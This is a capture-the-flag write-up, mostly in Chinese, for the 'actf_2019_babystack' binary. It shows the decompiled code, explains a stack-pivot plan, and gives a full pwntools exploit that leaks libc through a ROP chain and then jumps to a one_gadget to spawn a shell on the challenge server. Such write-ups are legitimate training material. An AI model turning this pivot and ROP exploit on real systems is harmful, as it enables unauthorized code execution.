actf_2019_babystack

actf_2019_babystack

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3ff000)

64位，只开了nx

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[208]; // [rsp+0h] [rbp-D0h] BYREF

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  signal(14, handler);
  alarm(0x3Cu);
  memset(s, 0, sizeof(s));
  puts("Welcome to ACTF's babystack!");
  sleep(3u);
  puts("How many bytes of your message?");
  putchar(62);
  sub_400A1A();
  if ( nbytes <= 0xE0 )
  {
    printf("Your message will be saved at %p\n", s);
    puts("What is the content of your message?");
    putchar(62);
    read(0, s, nbytes);
    puts("Byebye~");
    return 0LL;
  }
  else
  {
    puts("I've checked the boundary!");
    return 1LL;
  }
}

让我们输入size，并且这个size最大，刚好更栈空间相差0x10，明显的栈迁移，

给出了栈地址，我们迁移到栈即可

思路

写ret2libc到栈空间，并且溢出返回栈，第一次返回libc基地址，第二次直接使用onegadget去getshell

也就是使用两次栈迁移

from pwn import*
from Yapack import *
libc=ELF('libc-2.27.so')

r,elf=rec("node4.buuoj.cn",27330,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')

leave=0x400A18
rdi=0x0000000000400ad3
sla(b'>',str(0xe0))
stack=get_addr_int()
pl=p64(0)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4008F6)
pl=ljust(pl,0xd0)+flat(stack,leave)
sa(b'>',pl)
leak=get_addr_u64()-libc.sym['puts']
li(leak)
one=[0x4f2c5,0x4f322,0x10a38c]

sla(b'>',str(0xe0))
stack=get_addr_int()
pl=p64(0)+p64(one[0]+leak)
pl=ljust(pl,0xd0)+flat(stack,leave)
sa(b'>',pl)

ia()